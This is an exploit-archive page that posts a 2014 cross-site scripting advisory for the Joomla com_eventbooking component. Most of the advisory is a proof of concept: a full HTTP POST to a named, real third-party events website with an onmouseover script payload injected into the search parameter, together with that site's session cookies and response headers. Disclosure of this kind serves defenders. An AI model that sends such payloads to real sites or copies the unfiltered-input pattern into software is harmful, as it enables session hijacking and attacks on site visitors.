Joomla Eventbooking Cross Site Scripting

Joomla Eventbooking Cross Site Scripting: Posted Nov 13, 2014; Authored by Jagriti Sahu; The Joomla Eventbooking component suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 9b50f14aee44e44f20b0a4a6c605e2468e48bfe13ddce60537854cd9cb83ea26; Download | Favorite | View

Joomla Eventbooking Cross Site Scripting

##################################################################################################
#Exploit Title : Joomla com_eventbooking component XSS vulnerability
#Author        : Jagriti Sahu AKA incredible
#Download Link : https://github.com/Jasonudoo/platform/tree/master/components/com_eventbooking
#Date          : 13/11/2014
#Discovered at : IndiShell Lab
#Love to       : Surbhi, Mrudula and Harry
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


joomla component com_eventbooking is not filtering data in search parameter 
and hence affected from XSS vulnerability 

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to search parameter in search box, and pron to xss vulnerability


////////////////
///  POC   ////
///////////////

POC image=http://oi61.tinypic.com/aol6qc.jpg


http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101

POST /index.php?option=com_eventbooking&Itemid=101 HTTP/1.1
Host: eastvicevents.com.au
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101
Cookie: 230d19898da30be54648f536cbac3652=ca2096bf2055cf7c31462f8f056f84d4; __utma=222259084.1320908457.1415891642.1415891642.1415891642.1; __utmb=222259084.18.10.1415891642; __utmc=222259084; __utmz=222259084.1415891642.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

search=test" onmouseover=prompt(String.fromCharCode(120,115,115,32,116,101,115,116,105,110,103));//&category_id=13&location_id=474&option=com_eventbooking&Itemid=101&view=search

HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Thu, 13 Nov 2014 16:10:17 GMT
Server: LiteSpeed
X-Powered-By: PHP/5.5.18
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: close

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Joomla Eventbooking Cross Site Scripting

Joomla Eventbooking Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Eventbooking Cross Site Scripting

Share This

Joomla Eventbooking Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems